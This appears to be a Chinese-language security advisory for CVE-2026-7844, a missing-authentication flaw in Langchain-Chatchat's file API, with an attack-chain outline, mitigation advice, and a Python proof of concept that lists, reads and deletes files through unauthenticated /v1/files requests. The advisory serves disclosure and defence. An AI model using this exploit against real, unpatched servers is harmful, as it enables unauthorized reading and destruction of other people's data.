CVE-2026-7844 CVSS 6.3 中危

CVE-2026-7844 Langchain-Chatchat 认证缺失漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7844

漏洞类型

认证缺失

CVSS评分

6.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

chatchat-space Langchain-Chatchat

漏洞概述

chatchat-space Langchain-Chatchat 0.3.1.3及之前版本存在安全漏洞。该漏洞源于组件Compatible File Service中的文件处理函数未正确实施身份验证。攻击者无需用户交互，仅需访问本地网络即可利用此漏洞读取、删除文件，导致机密性、完整性和可用性受损。目前漏洞利用代码已公开，厂商尚未修复。

技术细节

该漏洞位于Langchain-Chatchat项目的`libs/chatchat-server/chatchat/server/api_server/openai_routes.py`文件中。问题出在Compatible File Service组件的文件操作接口上，具体涉及`list_files`、`retrieve_file`、`retrieve_file_content`和`delete_file`等函数。开发者在实现这些API端点时未添加必要的身份验证机制，导致匿名用户在能够访问服务所在局域网的情况下，可直接调用敏感接口。攻击者可通过构造特定的HTTP请求，无需任何凭证即可枚举服务器文件列表、读取敏感文件内容甚至删除关键数据。CVSS向量显示攻击复杂度低且无需用户交互，该漏洞在内网环境中具有较高的利用风险。

攻击链分析

STEP 1

侦察

攻击者扫描本地网络，识别出运行Langchain-Chatchat服务的目标主机及其开放的API端口。

STEP 2

漏洞利用

攻击者直接向目标服务器的`/v1/files`相关端点发送HTTP请求，利用未授权访问缺陷，绕过身份验证环节。

STEP 3

数据窃取与破坏

通过调用`list_files`枚举文件，使用`retrieve_file_content`读取敏感信息，或调用`delete_file`删除服务器上的关键文件，造成数据泄露或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit target URL (Example)
target_host = "http://127.0.0.1:7861"

# 1. List files without authentication
print("[1] Attempting to list files...")
list_url = f"{target_host}/v1/files"
response = requests.get(list_url)
if response.status_code == 200:
    print(f"[+] Success! Response: {response.text}")
else:
    print(f"[-] Failed with status code: {response.status_code}")

# 2. Retrieve file content
# Assuming file_id obtained or guessed
file_id = "test_file.txt"
print(f"[2] Attempting to retrieve content of {file_id}...")
content_url = f"{target_host}/v1/files/{file_id}/content"
response = requests.get(content_url)
if response.status_code == 200:
    print(f"[+] File content retrieved: {response.text}")

# 3. Delete file
print(f"[3] Attempting to delete {file_id}...")
delete_url = f"{target_host}/v1/files/{file_id}"
response = requests.delete(delete_url)
if response.status_code == 200:
    print("[+] File deleted successfully.")

影响范围

chatchat-space Langchain-Chatchat <= 0.3.1.3

防御指南

临时缓解措施

由于官方尚未发布补丁，建议立即在防火墙层面限制对受影响系统的网络访问，确保该服务仅在内网受信任的环境下运行，且不直接暴露于公网或不可信网段。同时，应密切监控服务器日志，检查是否存在异常的文件访问或删除操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表